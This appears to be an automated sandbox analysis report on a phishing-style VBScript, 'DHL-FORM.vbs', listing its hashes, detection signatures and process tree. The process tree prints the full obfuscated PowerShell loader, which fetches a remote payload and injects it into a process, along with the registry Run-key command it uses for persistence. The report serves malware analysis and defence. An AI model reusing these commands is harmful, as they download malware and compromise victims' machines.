Overview

overview

8

Static

static

1

DHL-FORM.vbs

windows7-x64

8

DHL-FORM.vbs

windows10-2004-x64

8

Resubmissions

15/05/2024, 15:44

240515-s6kp1age33 10

15/05/2024, 15:18

240515-sptlksfc5y 8

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/05/2024, 15:18

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    DHL-FORM.vbs

  • Size

    23KB

  • MD5

    0bd7c8ef21f710b46940bd86875d5b56

  • SHA1

    d286ef8490fbe81008c236fae2c71d998630dd61

  • SHA256

    2a2d8119c080478a79803f6475982389e8932af33ee5999c50d4aa3f65c8f91f

  • SHA512

    9b7e297e13f71255cdb4fb401074b7b934f9abb5db465a05905172e0c5f87b9a93f6cc23083022a53705327291f488d3b8b9d7f3e3f111323672eb5f77de9c63

  • SSDEEP

    384:9jYyYZkAniuZSuqDk5OJLa3fFG84Q4ryLGfa+zMrgVHrQVw:NYrZnnB+belZLcbrgw

Score
8/10
persistence

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL-FORM.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pleasantest = 1;$Progress='Su';$Progress+='bstrin';$Progress+='g';Function Sexologens($Hyperconstitutional){$Omvltendes=$Hyperconstitutional.Length-$Pleasantest;For($Graptolitoidea=4;$Graptolitoidea -lt $Omvltendes;$Graptolitoidea+=5){$tripper+=$Hyperconstitutional.$Progress.Invoke( $Graptolitoidea, $Pleasantest);}$tripper;}function Scarfpin237($Fejlnormens){. ($Spruer) ($Fejlnormens);}$Freakier=Sexologens 'KereMPostoSemazDem iD.iklCouplFlaaa elg/Conf5Rast. Nic0 ora .op( edrW Fori AganBreddStopoThorwMul,s St Bo.NM.ssTElet Over1Vide0Frg.. Sc 0Fore;sten ForeWNoteiLejlnDoku6Proe4 Res;Mde. Iodaxgenf6.ove4Over;Klau UbedrMon.vGove: Str1Skid2Unit1Unga.Kram0Fyrs)T.er ForsG,amaePushcSu.ekUseloCarm/,nas2Cest0Poli1.ohn0Alky0Futt1Pro.0Ud.u1.mph owFSk.tiSka,rQuateUnf,fAlgooFluaxEnto/Ex s1misp2fent1Udka.Sub.0Skrn ';$Divas=Sexologens ' .muUMonnsMur eColtrCo o-BubaAKrysgf.ldeRax.nCarot Si, ';$Statuecraft=Sexologens ',yrshSigttP,ost R,tpStoi:Cell/Reto/cold1Forb0 L,e3Pror.Ince1N.ti8Mlke2Fora.Vrim1Unco8Ste..Vemo1.onz5,ark2 Res/ oborMi.teCal,mExte/f naNInteyArtek KomkWhile Un.rfann.HulsdKonjssti pRetr ';$Ekstruderendes=Sexologens 'Inte>Fest ';$Spruer=Sexologens 'To.ti emyeStaixMeth ';$Parbate177='Thermionically';Scarfpin237 (Sexologens ' mgrSForteHaget Boj-w itC AntoPil,nphe.tS kke mo nRef,tAmmo Ud,i-TsetP paaaSupetForshKo,p ReocTDrae:In.b\TingI Miln,adidRa ciSurmv urri Camd K,au PiraFo kl.ndvi utetAphteBlastja neBenerFo,vn diseAnstscapi. TratFysix AprtArri S.d- V tV,nclaIndilCh.luStikeVend Bra$AutoPiminaLamerCirkbKom.aRa etBelieKas.1Kvst7,rea7 Pan;Papu ');Scarfpin237 (Sexologens '.idei,aprf Sej Digi(Lindt joreTe.ps.icot.osz- Undp Fora IrrtIrrehPseu GlamTsmsy:Fu.h\ FonILek,nFis ddu,piekslvSkivi ,agdOne.uUnivaScy lOveriDisstTambe ToctUnb,eColur DybnT nie,ejts nb.,pent ndexS,edtSdni)Prod{Amo,eRetaxKr oiRe,etStat}Anti; E.t ');$Whickering = Sexologens 'SlaaeE,ercGagahTatooSkyl Jan%Rec,a.orfpUddrpSyn dG,ilaNormt Aska .al%Spil\ StuAAlbudA gasWardp,orer CroeEtrudAlkeeHelmlUnmasDibreSkranForesChar.sp tDCloueDiakiSauc Baad&Raw,&Bri. LeereKollcR,sihNameoTjen Over$Nons ';Scarfpin237 (Sexologens 'Blse$Foreg Blil,revoAdvobFortaUnorl Int:ConiUF,rkdMultbCholi,entnFremd BaleTill=Skif(PrescNicam Stod Kli Dece/ Decc .ad Tils$FiniWfoedh OvaiFilac S.lkRekueVersrAthei RasnHvilgfors)Tyk, ');Scarfpin237 (Sexologens 'Fibe$BarngNskelIncooVe ebB idaE nrlAnat:.ideP .utl KicyHolon ,undTj nrv,ndiPongn UnsgCoise owrundesI dr= Hel$W.elSTerat RefaIsvitJeleu Rere,iljc .aprTyg,aGerafGe.at.arm.Un esDes pForblUrteiGnidtTob.( S a$SkriESystkOceasE,grtZinnr ToouUnludMulleUnskr M,teMaibnIn,sdCatee Co sSup.) aci ');$Statuecraft=$Plyndringers[0];Scarfpin237 (Sexologens 'gy.o$ForugIso lDuh.o.verbTrimaMosglBeke:BlowFUndeo I frFremmOmryu ElelAfsleHeptrPolyiindvn He,gUpgieN ncrPs,c= ,omNInd,ehkkewFjer-frasOVrtdbUnfaj biaeOarlcSolbtPosi Non.SPaalyEks s CodtFideeTandmResh.Fa.fN ermeUlvetMilj. ntWSpege ForbunfaCRibblfo.tiHag,es,xenUnlotSade ');Scarfpin237 (Sexologens 'beef$.rayFDiaso IdorU ammAndeuProslPas,ePr grAeroi,indnUlt,gLekteVankrBi.a. .ubHnonbeCi,caBogidPavee st r imns .aa[M.dd$ EbbD foriTek v ,veaRacosProp]Am h= ,ov$AnreFmisar,alleZopha abek ,aaiBri.e SenrP gi ');$Fictious=Sexologens ' AxoFkonco Donr.mnim Am uCalyl.aceeAlter ,uniQtkanSkolg FuneO,lirCi,i.plt,DGrusoJo.nwForunInd.lSindo Co,a b,idSkriF Ko,iE belExo.eSelm( Gal$maddSUnsttIrrea ,ultPe luNeureRu.scSub,r C.raE.gafPr dtZoop,de,t$Et.oHDiskeLallpDebaaEftetEnnii DagcT.bboAlint B jopresmHjlpyMest)Kond ';$Fictious=$Udbinde[1]+$Fictious;$Hepaticotomy=$Udbinde[0];Scarfpin237 (Sexologens 'Sknh$Co,ngC,nsl HesoAcetb TocaUdlal .et:G.ndIBeo s E.ttByceh S,amGoosi W.daMy o= G p(ColaT.rskeRapfs TertExcu-BelaPHobbaKorrtBrdrhO,er Simp$Se.pHUbereHjlppProdaU.ibtNo,riMotocBranoV.nrtAftno ,arm.ortyInto)Helf ');while (!$Isthmia) {Scarfpin237 (Sexologens ' Por$StejgFoldlPol o .ndbTykkaTe hlMuco: cutB H.ta.rafr Gasd.ergecon sShola N.enS,umiMangsFabrtPre 2Udd.5 B.y4coac=S.yt$AthatVok,rZosmuDisqeSupp ') ;Scarfpin237 $Fictious;Scarfpin237 (Sexologens 'AdamSMoist BroaSeeirO.tgtJ.nt-KonnSAngllAs,meSi,deAnstpPyro ,ytt4 ero ');Scarfpin237 (Sexologens 'Roqu$StougR,pel DrmoForrb lmaGrunl Fod:FlerIBebos ndetS.bphDemem.opki.mblaskra=Mikr( InfT HypeHovesParstLnde-R ngPPro.a Revt.upeh Inc Mu.t$ kolHCamleBranp BisaWatetabdeiHalicH.ffoOvertHomooHypemSviryBrea)Ka,u ') ;Scarfpin237 (Sexologens 'Dako$Lu,hgTr,llMiddoB mbb S.uaEftelIsla: ParH ExoaW tjl KonmFyrisRetr=Sluk$QuangMa,dllabyoBlueb S,aa,tinl Ti : Beto SkrpBry l MidsBeaseBasilUnsaihydrg ,aphSubseSaardLolleSektnc.arshusb+Kons+.dbr%Hulk$Kin.P ImmlMaray vernsyn d,arirIndsiLininD.dmgUnpoe PudrLd gsCasq. ,enc.orcoLbriudipsn In.tUncr ') ;$Statuecraft=$Plyndringers[$Halms];}$Konkurrenten=303219;$Dataindustriernes=27809;Scarfpin237 (Sexologens 'Udm.$ApatgSod.l Syso KidbPastaparalsno.:.radPHyp.aFo,erKo.lajaz mPos eI dgnrheotLeath Juma Ru nabdid .iseGodsl Bel Hete=Bana BurgGRefleCanotD fo-ApplCmonooSubin ukktOve eE oln ShetF,om Dr.p$IsobHSt oepapfpSeasaMetatUnaliobsec Io.oSammtImmooDispmStafyTama ');Scarfpin237 (Sexologens 'Te e$ Pr.gForelNoncoSyttbMozaaGrmmlPro.:Mi uMD,nni A,gs R,vtD.nmiOphtt,egtlSkeoeInde Air.=hjem L n[OndeS Anky.ovasPer,tSp,reNontm ,au.UddaCValgouncanPa kvSheee Ir r,ulttEngr]Samt:Krab:TyndFSystr.ndio Ke.mLadnBgrydaPrecsS.amePhil6Summ4AmorSC outOverr FiribondnTor gUnfi(A di$ LabPrhiza.prirUndeaMesam Nyke Ud nEduat Bl,hFreqaHarlnAbandflameRepll Nob) Tra ');Scarfpin237 (Sexologens 'Kons$SlvlgBr dl nkooMotibBalta.agrlAren:Po.tSRrfloIn el ,ila agnh sdi R dn BrosJ,rn .nd= Be. Son[AestSAlteySubssInamtWo.de.palmMise.Cy eTstareFranxfodnt,lan.MontEKelenG,racUnfaoHjlpdShalip,ednFrimgCho ]infe:Trgh:Ti,kAC.vaSVampCSen,IAn tIForm.NonsGSta eBrs tRinkS FiltConfrSlvfiPeran fkogPala(Beg.$RhinMCessiRecos.onctUndeiT.ndtDeselPreseC,nf).onf ');Scarfpin237 (Sexologens ',ven$CzecgsprelOve oSc.ob stoasviglHeli: yclCSe.uh ix aHa.mrNysstRea,epessk Ana=Appl$Cin.SP.eioFor,lAdoraBombnAfgiiJogunFilmsh ct.OntosYemeuInjebSkepsKasst FilrPerii V,knKoldgUmyn(Dhu $,ebeKS.ruo O inTalrkDuoduAirbrUni rTilte.ndonTekstemigeFil.nPuss,Brug$ nepDEthiaFisktDnnia,nsyi Sl,nCoeqdSuffuEtctsHacktstanrPreci Bare La,r ezcnMa,neOversMnte) Hum ');Scarfpin237 $Chartek;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Adspredelsens.Dei && echo $"
        3⤵
          PID:536
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Pleasantest = 1;$Progress='Su';$Progress+='bstrin';$Progress+='g';Function Sexologens($Hyperconstitutional){$Omvltendes=$Hyperconstitutional.Length-$Pleasantest;For($Graptolitoidea=4;$Graptolitoidea -lt $Omvltendes;$Graptolitoidea+=5){$tripper+=$Hyperconstitutional.$Progress.Invoke( $Graptolitoidea, $Pleasantest);}$tripper;}function Scarfpin237($Fejlnormens){. ($Spruer) ($Fejlnormens);}$Freakier=Sexologens 'KereMPostoSemazDem iD.iklCouplFlaaa elg/Conf5Rast. Nic0 ora .op( edrW Fori AganBreddStopoThorwMul,s St Bo.NM.ssTElet Over1Vide0Frg.. Sc 0Fore;sten ForeWNoteiLejlnDoku6Proe4 Res;Mde. Iodaxgenf6.ove4Over;Klau UbedrMon.vGove: Str1Skid2Unit1Unga.Kram0Fyrs)T.er ForsG,amaePushcSu.ekUseloCarm/,nas2Cest0Poli1.ohn0Alky0Futt1Pro.0Ud.u1.mph owFSk.tiSka,rQuateUnf,fAlgooFluaxEnto/Ex s1misp2fent1Udka.Sub.0Skrn ';$Divas=Sexologens ' .muUMonnsMur eColtrCo o-BubaAKrysgf.ldeRax.nCarot Si, ';$Statuecraft=Sexologens ',yrshSigttP,ost R,tpStoi:Cell/Reto/cold1Forb0 L,e3Pror.Ince1N.ti8Mlke2Fora.Vrim1Unco8Ste..Vemo1.onz5,ark2 Res/ oborMi.teCal,mExte/f naNInteyArtek KomkWhile Un.rfann.HulsdKonjssti pRetr ';$Ekstruderendes=Sexologens 'Inte>Fest ';$Spruer=Sexologens 'To.ti emyeStaixMeth ';$Parbate177='Thermionically';Scarfpin237 (Sexologens ' mgrSForteHaget Boj-w itC AntoPil,nphe.tS kke mo nRef,tAmmo Ud,i-TsetP paaaSupetForshKo,p ReocTDrae:In.b\TingI Miln,adidRa ciSurmv urri Camd K,au PiraFo kl.ndvi utetAphteBlastja neBenerFo,vn diseAnstscapi. TratFysix AprtArri S.d- V tV,nclaIndilCh.luStikeVend Bra$AutoPiminaLamerCirkbKom.aRa etBelieKas.1Kvst7,rea7 Pan;Papu ');Scarfpin237 (Sexologens '.idei,aprf Sej Digi(Lindt joreTe.ps.icot.osz- Undp Fora IrrtIrrehPseu GlamTsmsy:Fu.h\ FonILek,nFis ddu,piekslvSkivi ,agdOne.uUnivaScy lOveriDisstTambe ToctUnb,eColur DybnT nie,ejts nb.,pent ndexS,edtSdni)Prod{Amo,eRetaxKr oiRe,etStat}Anti; E.t ');$Whickering = Sexologens 'SlaaeE,ercGagahTatooSkyl Jan%Rec,a.orfpUddrpSyn dG,ilaNormt Aska .al%Spil\ StuAAlbudA gasWardp,orer CroeEtrudAlkeeHelmlUnmasDibreSkranForesChar.sp tDCloueDiakiSauc Baad&Raw,&Bri. LeereKollcR,sihNameoTjen Over$Nons ';Scarfpin237 (Sexologens 'Blse$Foreg Blil,revoAdvobFortaUnorl Int:ConiUF,rkdMultbCholi,entnFremd BaleTill=Skif(PrescNicam Stod Kli Dece/ Decc .ad Tils$FiniWfoedh OvaiFilac S.lkRekueVersrAthei RasnHvilgfors)Tyk, ');Scarfpin237 (Sexologens 'Fibe$BarngNskelIncooVe ebB idaE nrlAnat:.ideP .utl KicyHolon ,undTj nrv,ndiPongn UnsgCoise owrundesI dr= Hel$W.elSTerat RefaIsvitJeleu Rere,iljc .aprTyg,aGerafGe.at.arm.Un esDes pForblUrteiGnidtTob.( S a$SkriESystkOceasE,grtZinnr ToouUnludMulleUnskr M,teMaibnIn,sdCatee Co sSup.) aci ');$Statuecraft=$Plyndringers[0];Scarfpin237 (Sexologens 'gy.o$ForugIso lDuh.o.verbTrimaMosglBeke:BlowFUndeo I frFremmOmryu ElelAfsleHeptrPolyiindvn He,gUpgieN ncrPs,c= ,omNInd,ehkkewFjer-frasOVrtdbUnfaj biaeOarlcSolbtPosi Non.SPaalyEks s CodtFideeTandmResh.Fa.fN ermeUlvetMilj. ntWSpege ForbunfaCRibblfo.tiHag,es,xenUnlotSade ');Scarfpin237 (Sexologens 'beef$.rayFDiaso IdorU ammAndeuProslPas,ePr grAeroi,indnUlt,gLekteVankrBi.a. .ubHnonbeCi,caBogidPavee st r imns .aa[M.dd$ EbbD foriTek v ,veaRacosProp]Am h= ,ov$AnreFmisar,alleZopha abek ,aaiBri.e SenrP gi ');$Fictious=Sexologens ' AxoFkonco Donr.mnim Am uCalyl.aceeAlter ,uniQtkanSkolg FuneO,lirCi,i.plt,DGrusoJo.nwForunInd.lSindo Co,a b,idSkriF Ko,iE belExo.eSelm( Gal$maddSUnsttIrrea ,ultPe luNeureRu.scSub,r C.raE.gafPr dtZoop,de,t$Et.oHDiskeLallpDebaaEftetEnnii DagcT.bboAlint B jopresmHjlpyMest)Kond ';$Fictious=$Udbinde[1]+$Fictious;$Hepaticotomy=$Udbinde[0];Scarfpin237 (Sexologens 'Sknh$Co,ngC,nsl HesoAcetb TocaUdlal .et:G.ndIBeo s E.ttByceh S,amGoosi W.daMy o= G p(ColaT.rskeRapfs TertExcu-BelaPHobbaKorrtBrdrhO,er Simp$Se.pHUbereHjlppProdaU.ibtNo,riMotocBranoV.nrtAftno ,arm.ortyInto)Helf ');while (!$Isthmia) {Scarfpin237 (Sexologens ' Por$StejgFoldlPol o .ndbTykkaTe hlMuco: cutB H.ta.rafr Gasd.ergecon sShola N.enS,umiMangsFabrtPre 2Udd.5 B.y4coac=S.yt$AthatVok,rZosmuDisqeSupp ') ;Scarfpin237 $Fictious;Scarfpin237 (Sexologens 'AdamSMoist BroaSeeirO.tgtJ.nt-KonnSAngllAs,meSi,deAnstpPyro ,ytt4 ero ');Scarfpin237 (Sexologens 'Roqu$StougR,pel DrmoForrb lmaGrunl Fod:FlerIBebos ndetS.bphDemem.opki.mblaskra=Mikr( InfT HypeHovesParstLnde-R ngPPro.a Revt.upeh Inc Mu.t$ kolHCamleBranp BisaWatetabdeiHalicH.ffoOvertHomooHypemSviryBrea)Ka,u ') ;Scarfpin237 (Sexologens 'Dako$Lu,hgTr,llMiddoB mbb S.uaEftelIsla: ParH ExoaW tjl KonmFyrisRetr=Sluk$QuangMa,dllabyoBlueb S,aa,tinl Ti : Beto SkrpBry l MidsBeaseBasilUnsaihydrg ,aphSubseSaardLolleSektnc.arshusb+Kons+.dbr%Hulk$Kin.P ImmlMaray vernsyn d,arirIndsiLininD.dmgUnpoe PudrLd gsCasq. ,enc.orcoLbriudipsn In.tUncr ') ;$Statuecraft=$Plyndringers[$Halms];}$Konkurrenten=303219;$Dataindustriernes=27809;Scarfpin237 (Sexologens 'Udm.$ApatgSod.l Syso KidbPastaparalsno.:.radPHyp.aFo,erKo.lajaz mPos eI dgnrheotLeath Juma Ru nabdid .iseGodsl Bel Hete=Bana BurgGRefleCanotD fo-ApplCmonooSubin ukktOve eE oln ShetF,om Dr.p$IsobHSt oepapfpSeasaMetatUnaliobsec Io.oSammtImmooDispmStafyTama ');Scarfpin237 (Sexologens 'Te e$ Pr.gForelNoncoSyttbMozaaGrmmlPro.:Mi uMD,nni A,gs R,vtD.nmiOphtt,egtlSkeoeInde Air.=hjem L n[OndeS Anky.ovasPer,tSp,reNontm ,au.UddaCValgouncanPa kvSheee Ir r,ulttEngr]Samt:Krab:TyndFSystr.ndio Ke.mLadnBgrydaPrecsS.amePhil6Summ4AmorSC outOverr FiribondnTor gUnfi(A di$ LabPrhiza.prirUndeaMesam Nyke Ud nEduat Bl,hFreqaHarlnAbandflameRepll Nob) Tra ');Scarfpin237 (Sexologens 'Kons$SlvlgBr dl nkooMotibBalta.agrlAren:Po.tSRrfloIn el ,ila agnh sdi R dn BrosJ,rn .nd= Be. Son[AestSAlteySubssInamtWo.de.palmMise.Cy eTstareFranxfodnt,lan.MontEKelenG,racUnfaoHjlpdShalip,ednFrimgCho ]infe:Trgh:Ti,kAC.vaSVampCSen,IAn tIForm.NonsGSta eBrs tRinkS FiltConfrSlvfiPeran fkogPala(Beg.$RhinMCessiRecos.onctUndeiT.ndtDeselPreseC,nf).onf ');Scarfpin237 (Sexologens ',ven$CzecgsprelOve oSc.ob stoasviglHeli: yclCSe.uh ix aHa.mrNysstRea,epessk Ana=Appl$Cin.SP.eioFor,lAdoraBombnAfgiiJogunFilmsh ct.OntosYemeuInjebSkepsKasst FilrPerii V,knKoldgUmyn(Dhu $,ebeKS.ruo O inTalrkDuoduAirbrUni rTilte.ndonTekstemigeFil.nPuss,Brug$ nepDEthiaFisktDnnia,nsyi Sl,nCoeqdSuffuEtctsHacktstanrPreci Bare La,r ezcnMa,neOversMnte) Hum ');Scarfpin237 $Chartek;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Adspredelsens.Dei && echo $"
            4⤵
              PID:3784
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1488
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Realterably" /t REG_EXPAND_SZ /d "%Pointberegnings% -w 1 $Gnidningsfrit=(Get-ItemProperty -Path 'HKCU:\Flerstavelsesordets\').Axonophorous;%Pointberegnings% ($Gnidningsfrit)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1332
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Realterably" /t REG_EXPAND_SZ /d "%Pointberegnings% -w 1 $Gnidningsfrit=(Get-ItemProperty -Path 'HKCU:\Flerstavelsesordets\').Axonophorous;%Pointberegnings% ($Gnidningsfrit)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1436

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gdgx4o5p.z04.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Adspredelsens.Dei
              Filesize

              431KB

              MD5

              feedb383a55f1628196649f3a4d15092

              SHA1

              e22f86870a275a625ea05337c70e2827ed6a0c81

              SHA256

              258b7c27d0d311e36a1903448ea5c7fe72269c4ecb357c5cc79dba67229f2766

              SHA512

              c0240b5b167a4f995b49f7ed62efa8ba8a595b844d76e506c557ab78183311cbd914ea62275915542276296337476e800426ddda7187d23805e8a88e164ae6e1

              Download Submit

            • memory/1488-46-0x0000000000EB0000-0x0000000002104000-memory.dmp

              Filesize

              18.3MB

              Download

            • memory/1748-41-0x0000000006300000-0x0000000006322000-memory.dmp

              Filesize

              136KB

              Download

            • memory/1748-37-0x0000000005D30000-0x0000000005D7C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/1748-44-0x0000000008740000-0x000000000D762000-memory.dmp

              Filesize

              80.1MB

              Download

            • memory/1748-42-0x0000000008190000-0x0000000008734000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/1748-21-0x0000000004720000-0x0000000004756000-memory.dmp

              Filesize

              216KB

              Download

            • memory/1748-22-0x0000000004E90000-0x00000000054B8000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/1748-23-0x0000000004D40000-0x0000000004D62000-memory.dmp

              Filesize

              136KB

              Download

            • memory/1748-24-0x0000000005630000-0x0000000005696000-memory.dmp

              Filesize

              408KB

              Download

            • memory/1748-25-0x00000000056D0000-0x0000000005736000-memory.dmp

              Filesize

              408KB

              Download

            • memory/1748-35-0x0000000005840000-0x0000000005B94000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/1748-36-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/1748-40-0x0000000006FA0000-0x0000000007036000-memory.dmp

              Filesize

              600KB

              Download

            • memory/1748-38-0x0000000007560000-0x0000000007BDA000-memory.dmp

              Filesize

              6.5MB

              Download

            • memory/1748-39-0x0000000006280000-0x000000000629A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/2088-16-0x00007FFE30F80000-0x00007FFE31A41000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2088-4-0x00007FFE30F83000-0x00007FFE30F85000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2088-18-0x00007FFE30F80000-0x00007FFE31A41000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2088-15-0x00007FFE30F80000-0x00007FFE31A41000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2088-17-0x00007FFE30F80000-0x00007FFE31A41000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2088-10-0x00000188C7CC0000-0x00000188C7CE2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2088-54-0x00007FFE30F80000-0x00007FFE31A41000-memory.dmp

              Filesize

              10.8MB

              Download